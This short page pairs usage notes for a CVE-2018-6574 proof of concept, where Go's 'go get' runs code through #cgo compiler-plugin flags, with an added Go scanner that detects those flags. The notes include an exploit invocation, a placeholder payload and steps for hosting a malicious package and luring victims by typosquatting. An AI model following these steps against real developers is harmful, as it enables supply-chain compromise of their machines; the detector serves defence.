Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.
An attack has to be approached locally. A single authentication is needed for exploitation. So a user, or a function that uses the same approach, may be exploited via a typosquatting technique or other ways.
Exploit
ruby cve-2018-6574_exploit.rb <PAYLOAD>
The PoC depends on your case and payload.
-> ruby cve-CVE-2018-6574_exploit.rb "touch /tmp/owned"
[1] Upload 'go-get-rce' folder to github
[2] try: go get https://github.com/[username]/go-get-rce.git
- Replace the 'touch /tmp/owned' payload with your own.
- A directory called 'go-get-rce' will be created, containing a package and the malicious plugin.
- Upload the 'go-get-rce' directory to github or any remote host.
- From the vulnerable function, execute (go get https://github.com/[username]/go-get-rce)
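
A defender-side check for the arguments named in the description above, added here as an example and not part of the original exploit repository: it scans Go source text for #cgo directives carrying -fplugin= or -plugin= arguments before a package is fetched or built. The function names and the sample source are constructed for illustration, and inspecting arguments forwarded with -Wl, goes slightly beyond the two forms the description lists.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// isPluginFlag reports whether one #cgo argument loads a compiler or linker plugin.
func isPluginFlag(field string) bool {
	for _, part := range strings.Split(field, ",") { // also inspect -Wl,<arg> forwarding
		if strings.HasPrefix(part, "-fplugin=") || strings.HasPrefix(part, "-plugin=") {
			return true
		}
	}
	return false
}

// ScanCgoFlags returns "line N: flag" for every plugin argument in #cgo lines of src.
func ScanCgoFlags(src string) []string {
	var out []string
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		line := strings.TrimSpace(strings.TrimPrefix(strings.TrimSpace(sc.Text()), "//"))
		kv := strings.SplitN(line, ":", 2)
		if !strings.HasPrefix(line, "#cgo") || len(kv) != 2 {
			continue
		}
		for _, f := range strings.Fields(kv[1]) {
			if isPluginFlag(f) {
				out = append(out, fmt.Sprintf("line %d: %s", n, f))
			}
		}
	}
	return out
}

// Constructed sample source, not taken from the page or any real repository.
const sample = `package demo

/*
#cgo CFLAGS: -O2 -fplugin=./plugin.so
#cgo linux LDFLAGS: -lm -Wl,-plugin=./ld.so
*/
import "C"
`

func main() {
	fmt.Println(strings.Join(ScanCgoFlags(sample), "\n"))
}
```

Running a check like this over a dependency's source before building it flags the directive regardless of which Go release performs the build.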